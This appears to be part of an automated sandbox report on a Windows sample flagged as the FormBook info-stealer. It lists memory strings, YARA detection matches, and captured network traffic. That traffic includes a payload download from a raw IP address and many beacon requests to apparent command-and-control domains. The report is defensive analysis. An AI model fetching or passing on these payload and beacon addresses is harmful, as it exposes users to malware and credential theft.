Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/nachrichten/welt/putin-sieht-nur-einen-ausweg/ar-AA1eEs3S
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/nachrichten/welt/russlands-grizzly-geht-in-flammen-auf-video-zeigt-pr
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/nachrichten/welt/ukraine-invasion-tag-525-kiew-entscheidet-das-artillerie-
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/reisen/artikel/so-gro
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/reisen/nachrichten/invasion-an-der-ostsee/ar-AA1eDw6u
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/sport/fussball/soccer-international-world-cup-women
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/sport/fussball/uefa-champions-league
Source: explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/sport/motorsport/motogp/renn-kalender
Source: explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/sport/motorsport/nascar/renn-kalender
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/unterhaltung/kino/die-dramatischsten-serientode-der-tv-geschichte/ss-AA1eC
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/unterhaltung/kino/the-witcher-4-f
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/unterhaltung/other/rosi-mittermaier-72-am-fu
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/unterhaltung/tv/darum-schalteten-am-montag-um-22-00-uhr-reihenweise-zuscha
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/video/nachrichten/feuerball-im-gesicht-raucher-erlebt-b
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/video/nachrichten/vom-handy-abgelenkt-rolltreppe-bleibt-stehen-frau-bemerk
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-de/wetter/topgeschichten/irres-wetter-wintersturm-n
Source: explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/de-de/feed

Source: unknown

DNS traffic detected: queries for: www.qwevqgjw.cfd

Source: global traffic	HTTP traffic detected: GET /windows/kHjzvgNVUFKkek92.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: 198.46.176.189Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=ZV58cyt7lud3nw6eSnCnw3hvj6dUBdrYkOi4GK43GwnmJSRRdDKHOou2s3Asj9CH0dO3&5jjx=X41P HTTP/1.1Host: www.qwevqgjw.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=0MCVt3ro+Y2fULC7mglHTnfgc1Mr+oeAYZcaZJUD5Vdcg90q3P52QZV9uqsVct+gY69j&5jjx=X41P HTTP/1.1Host: www.lasik-de-de-8808230.zoneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=gRDHLRWps2SwfQlNymIqzXaD2m02lj01kyW0DgHYrNguW9LYnKWDMhmIqN1YZq9kwDef&5jjx=X41P HTTP/1.1Host: www.qhrxnxoe.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=FAG/3ElgsYO4ErXa/mgt4C2qrKDxzHtkbmVaewmXtr6V8s4U3UCtQRfDU66dhU0yfzW0&5jjx=X41P HTTP/1.1Host: www.sxbhpysr.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=x+ehIhQzCHSzi6+DzanXnJOFQcXmX6xS+w2gYe8McJfF9Pp0nYwm3E09SfZIXmikxG0j&5jjx=X41P HTTP/1.1Host: www.venria.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=Wkneoq9l7j621GOHWXUj6c6StoZcfXIkvhnfDRklCPhPpoBwnB0eenfjXWBkChp12+Xn&5jjx=X41P HTTP/1.1Host: www.zbjcolwy.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=h3fLfZ3xRyUaMvmJY+vXkDus6c4OoHicU91y3xWN8xaUQgPaFkGWnw7wqHbjUCdbn7CG&5jjx=X41P HTTP/1.1Host: www.ypasbfxplu.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=4tMVn6XiBHKuKW8VU2EIZ5B/qrpEFZzqaYDMFWWeQmJxL9kkTfJwlmrKp7OjJJRb95od&5jjx=X41P HTTP/1.1Host: www.nihil.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=u3S/fUpBdl6P8b4ADNn+FVx0VEGCDPoJ7b9d+427u3NTiKr5dAp1QyZtAqVtC5y+GShx&5jjx=X41P HTTP/1.1Host: www.lilith-con.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=YHJhEiWoifUmsuRZQbUaqtt89OE4JOQRavFR3vIQ0joiEOwiU7X+YqSmQ5n9nRvRM2aG&5jjx=X41P HTTP/1.1Host: www.lojaasoriginais.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&5jjx=X41P HTTP/1.1Host: www.aniwatch.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=zE+GbO9DWh6B2kXf3cE5o589bQHva9Su9PKDhuKrO6jzYqtjY6jl14E5kwylDApimKPF&5jjx=X41P HTTP/1.1Host: www.genqaagz.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=zE+GbO9DWh6B2kXf3cE5o589bQHva9Su9PKDhuKrO6jzYqtjY6jl14E5kwylDApimKPF&5jjx=X41P HTTP/1.1Host: www.genqaagz.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=3gz0oynYp3zT8Gk2EcItbwP2BcX4ajQnXUoMFrcFLcYyHJZZ+09POgtQTNUueZNkOof2&5jjx=X41P HTTP/1.1Host: www.duffledash.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=yfXJ3s0X+UYbexsvWZAPRPW6ab6VS3ID2ShjjTekTQ3Ib7o/HmiXiV9bVqQN/326JqDz&-Zxtd=AXLT HTTP/1.1Host: www.aqeabrdm.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=v4jnj8oeAfTGDwcmYumWnwKscPxyy00cSlVLGwHp+ICaVPGa7n49O8PyWRHvgaeZi/w4&-Zxtd=AXLT HTTP/1.1Host: www.cacciatoridiofferte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=gRDHLRWps2SwfQlNymIqzXaD2m02lj01kyW0DgHYrNguW9LYnKWDMhmIqN1YZq9kwDef&-Zxtd=AXLT HTTP/1.1Host: www.qhrxnxoe.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=FUnpMs8zmvOjmROP3PnlROYxRJ7cCFlgEWWc0/bexyWbb6gAbwR4+JgC7sIqrRtPqJOK&-Zxtd=AXLT HTTP/1.1Host: www.peterscanner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1Host: www.pgtjirqx.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1Host: www.pgtjirqx.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1Host: www.pgtjirqx.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&-Zxtd=AXLT HTTP/1.1Host: www.aniwatch.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 0_2_004050E4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050E4

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.5876788993.0000000010B5C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wLlREXsA9M.exe PID: 7852, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 8548, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: wLlREXsA9M.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
